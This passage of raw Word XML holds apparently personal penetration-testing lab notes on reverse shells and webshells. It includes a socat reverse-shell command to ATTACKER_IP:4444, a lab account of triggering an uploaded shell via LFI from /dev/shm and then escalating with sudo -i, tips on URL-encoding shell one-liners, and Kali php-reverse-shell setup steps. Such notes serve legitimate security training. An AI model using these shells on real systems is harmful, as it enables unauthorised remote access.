      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socat:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat file:`tty`,raw,echo=0 tcp-listen:4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001031">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine (if socat is available):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001033">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001034">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If socat is not installed, you can try to upload a static binary of socat to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001037">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001039">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000103A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000103B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010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3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000103E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kskxaui205ka" w:id="133"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shells and webshells to websites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000103F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.246</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we learned a VERY important technique. We had access to the machine via another account, but we wanted access to the account that was running the website (www-data). So we wanted to upload reverse shell and trigger it. We already had LFI, so we just had to upload and trigger it via LFI. We needed LFI since there was not upload function on the website, and we would have to use the other user account to upload to the machine directly (via terminal) and then find it using LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001041">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001042">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT, when we uploaded reverse shell to /tmp, it the shell didn't work. This might because www-data doesn't have permissions to access /tmp. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SO, we should always upload to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is usually a directory that EVERYONE has access to, including www-data. So uploaded it there, accessed via LFI, and then got a shell. www-data ended up being able to use sudo for anything so we just ran sudo -i to get root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001045">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId329">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP webshell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ince it has a nice web interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia .249</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When putting a reverse shell in a URL (like copy and pasting the one-liner into URL), if it doesn't work then try URL-encoding it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When uploading Reverse Shell (or doing one-liner rev shells in URL), if you have command execution, you can use the "which" command to see what is installed on the target machine. Like if they have python for example, then you know they can use python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001050">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001051">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quite different from a reverse shell. Web Shells provide an attacker with remote access to a web server. It is usually interacted with through HTTP requests, like in the URL. It doesn't require connecting back to the attacker's system, since the Web shell stays on the target's web server, and you interact with it through the target's web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001053">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001054">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell collection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId330">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/TheBinitGhimire/Web-Shells</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001056">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some reverse shells and webshells are already included in Kali by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/webshells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes directories like php and perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001059">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the php rev shell, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this to edit the IP address and port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
